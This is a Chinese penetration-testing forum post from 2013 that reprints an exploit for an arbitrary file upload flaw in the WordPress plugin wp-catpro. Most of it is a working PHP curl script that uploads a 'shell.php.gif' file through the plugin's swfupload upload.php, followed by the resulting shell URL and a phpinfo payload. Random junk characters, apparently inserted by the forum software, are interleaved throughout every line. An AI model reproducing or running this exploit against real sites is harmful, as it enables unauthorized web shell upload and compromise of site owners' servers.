中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
3 f9 k. a# l8 A" X#-----------------------------------------------------------------------
! j& T& `, B) J. Z
6 P/ R7 _/ L; i4 J- k& B/ J+ S; n作者  => Zikou-16" z3 d" o. z1 u& v4 L
邮箱 => zikou16x@gmail.com
: [. a; Z! L: b测试系统 : Windows 7 , Backtrack 5r3
7 h3 Z4 d: F* a下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip! J$ q, Z3 b/ S" w. ?& B
####5 }1 f1 o/ C( Q$ a

8 p& @7 F, x  a# ~& c* W8 [# Y; c#=> Exploit 信息:
# j/ q: a0 n& d, X& ?------------------# G6 w, W! w! U% |' w% P2 E" ?$ U
# 攻击者可以上传 file/shell.php.gif
6 h: j. K0 Y" W5 Z# ("jpg", "gif", "png")  // Allowed file extensions
- T% d8 B' @* X; U# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
% i* Y  o/ p: q& C! |) _; C. q# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
. k" B; E& I1 X$ `7 ~9 y# J------------------8 @6 L1 V- q0 P8 J( A

  Q. a! j4 ~5 T" H/ v; W% ^#=> Exploit( @$ y7 |6 ^% M9 w
-----------
; M) D: `! ?( a& v# p<?php7 X# @" D4 ?# Z/ r( @

( v8 M( M/ r3 P$uploadfile="zik.php.gif";# u' x; X  {2 t5 b
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
, P: ?* p; h, X/ Z3 U) L# m9 v# mcurl_setopt($ch, CURLOPT_POST, true);1 S& z, E% r; k' ~4 Q
curl_setopt($ch, CURLOPT_POSTFIELDS,
2 x7 \4 b7 V9 k2 w/ G- U0 a0 Y# }array('Filedata'=>"@$uploadfile",
+ j; ]. a2 r$ }2 c9 F& y'folder'=>'/wp-content/uploads/catpro/'));
- y: |% D- \; V5 u7 g# o6 ecurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3 R& z3 h1 C8 V/ u; s$postResult = curl_exec($ch);
& w) T8 `9 P( S9 T$ O: N& gcurl_close($ch);
4 u. k1 X0 b+ M( U: ^' z7 R$ E 6 c4 E$ R: y8 m( e  _
print "$postResult";
- k5 e% w2 o7 C' K/ Z) O / u! x) n( L; [6 P7 h
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
$ V% w7 R  W$ J) R  ?># T5 |6 J3 q  m' w
<?php( k; o9 `4 d' d2 ?
phpinfo();5 P2 j- b+ A$ l) ]/ y" L
?>




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2